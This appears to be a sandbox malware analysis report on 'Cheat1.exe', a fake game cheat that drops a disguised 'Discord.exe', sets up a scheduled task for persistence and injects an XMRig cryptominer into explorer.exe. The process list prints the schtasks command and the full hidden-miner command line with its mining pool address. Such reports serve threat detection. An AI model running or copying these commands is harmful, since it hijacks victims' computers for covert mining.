Analysis
-
max time kernel
147s -
max time network
154s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
23-05-2024 00:20
Static task
static1
Behavioral task
behavioral1
Sample
Cheat1.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Cheat1.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
CheatMoney.exe
Resource
win7-20240221-en
General
-
Target
Cheat1.exe
-
Size
2.1MB
-
MD5
7ced67a2b06d542de8884bd8ef3388c8
-
SHA1
c2892cb614be03ec39988f9eb1ee5a60dfa74fe4
-
SHA256
19b5505a570061e49819101533505d29bc37d74588b4fec9334e836ea5199ea8
-
SHA512
0303874a789e678861d0b3501b07ac67ad5d0fc69c6607093e59775d142d17e9171a8b66ae88b6a45bed5b0f4373d6897a6b631e8f3f04bc9cb64daebe0e7b40
-
SSDEEP
49152:Uw3FhtA331AcHguh9JBiXIgl8HBsuvQDei7KbT5+i:D3Ff41/FhBiHesuvQL8X
Malware Config
Signatures
-
XMRig Miner payload 10 IoCs
Processes:
resource yara_rule behavioral2/memory/360-41-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/360-40-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/360-48-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/360-49-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/360-47-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/360-45-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/360-46-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/360-50-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/360-52-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/360-51-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
Processes:
Discord.exesihost64.exepid process 3712 Discord.exe 2328 sihost64.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 3104 set thread context of 360 3104 conhost.exe explorer.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
conhost.execonhost.exeexplorer.exepid process 2280 conhost.exe 3104 conhost.exe 3104 conhost.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe 360 explorer.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
conhost.execonhost.exeexplorer.exedescription pid process Token: SeDebugPrivilege 2280 conhost.exe Token: SeDebugPrivilege 3104 conhost.exe Token: SeLockMemoryPrivilege 360 explorer.exe Token: SeLockMemoryPrivilege 360 explorer.exe -
Suspicious use of WriteProcessMemory 34 IoCs
Processes:
Cheat1.execonhost.execmd.execmd.exeDiscord.execonhost.exesihost64.exedescription pid process target process PID 4616 wrote to memory of 2280 4616 Cheat1.exe conhost.exe PID 4616 wrote to memory of 2280 4616 Cheat1.exe conhost.exe PID 4616 wrote to memory of 2280 4616 Cheat1.exe conhost.exe PID 2280 wrote to memory of 3572 2280 conhost.exe cmd.exe PID 2280 wrote to memory of 3572 2280 conhost.exe cmd.exe PID 3572 wrote to memory of 292 3572 cmd.exe schtasks.exe PID 3572 wrote to memory of 292 3572 cmd.exe schtasks.exe PID 2280 wrote to memory of 2404 2280 conhost.exe cmd.exe PID 2280 wrote to memory of 2404 2280 conhost.exe cmd.exe PID 2404 wrote to memory of 3712 2404 cmd.exe Discord.exe PID 2404 wrote to memory of 3712 2404 cmd.exe Discord.exe PID 3712 wrote to memory of 3104 3712 Discord.exe conhost.exe PID 3712 wrote to memory of 3104 3712 Discord.exe conhost.exe PID 3712 wrote to memory of 3104 3712 Discord.exe conhost.exe PID 3104 wrote to memory of 2328 3104 conhost.exe sihost64.exe PID 3104 wrote to memory of 2328 3104 conhost.exe sihost64.exe PID 3104 wrote to memory of 360 3104 conhost.exe explorer.exe PID 3104 wrote to memory of 360 3104 conhost.exe explorer.exe PID 3104 wrote to memory of 360 3104 conhost.exe explorer.exe PID 3104 wrote to memory of 360 3104 conhost.exe explorer.exe PID 3104 wrote to memory of 360 3104 conhost.exe explorer.exe PID 3104 wrote to memory of 360 3104 conhost.exe explorer.exe PID 3104 wrote to memory of 360 3104 conhost.exe explorer.exe PID 3104 wrote to memory of 360 3104 conhost.exe explorer.exe PID 3104 wrote to memory of 360 3104 conhost.exe explorer.exe PID 3104 wrote to memory of 360 3104 conhost.exe explorer.exe PID 3104 wrote to memory of 360 3104 conhost.exe explorer.exe PID 3104 wrote to memory of 360 3104 conhost.exe explorer.exe PID 3104 wrote to memory of 360 3104 conhost.exe explorer.exe PID 3104 wrote to memory of 360 3104 conhost.exe explorer.exe PID 3104 wrote to memory of 360 3104 conhost.exe explorer.exe PID 2328 wrote to memory of 4160 2328 sihost64.exe conhost.exe PID 2328 wrote to memory of 4160 2328 sihost64.exe conhost.exe PID 2328 wrote to memory of 4160 2328 sihost64.exe conhost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Cheat1.exe"C:\Users\Admin\AppData\Local\Temp\Cheat1.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Cheat1.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr "C:\Users\Admin\AppData\Local\Temp\Discord.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr "C:\Users\Admin\AppData\Local\Temp\Discord.exe"4⤵
- Creates scheduled task(s)
PID:292 -
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\Discord.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Users\Admin\AppData\Local\Temp\Discord.exeC:\Users\Admin\AppData\Local\Temp\Discord.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3712 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Discord.exe"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"7⤵PID:4160
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=7201279 --pass=Cheat --cpu-max-threads-hint=50 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=80 --cinit-stealth6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:360
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
539B
MD584f2160705ac9a032c002f966498ef74
SHA1e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA2567840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
-
Filesize
2.1MB
MD57ced67a2b06d542de8884bd8ef3388c8
SHA1c2892cb614be03ec39988f9eb1ee5a60dfa74fe4
SHA25619b5505a570061e49819101533505d29bc37d74588b4fec9334e836ea5199ea8
SHA5120303874a789e678861d0b3501b07ac67ad5d0fc69c6607093e59775d142d17e9171a8b66ae88b6a45bed5b0f4373d6897a6b631e8f3f04bc9cb64daebe0e7b40
-
Filesize
31KB
MD599f6ddfde83c4a40084b29ec309336c7
SHA17246f470c153a8c107fb4ff153da01f76c14db8e
SHA25637773977416a09ae07d05dda3ecf488bba262436cd59a161f8189aeac5a35c81
SHA512c488d00bf7678d4c28b392ddf8749cdef8875b0e451c4e7d1dcf214acbd15bfc2d71d6514c3e122a2dd7fc91aee9d4257d4551eeb12983a2858c14c8ddf23b95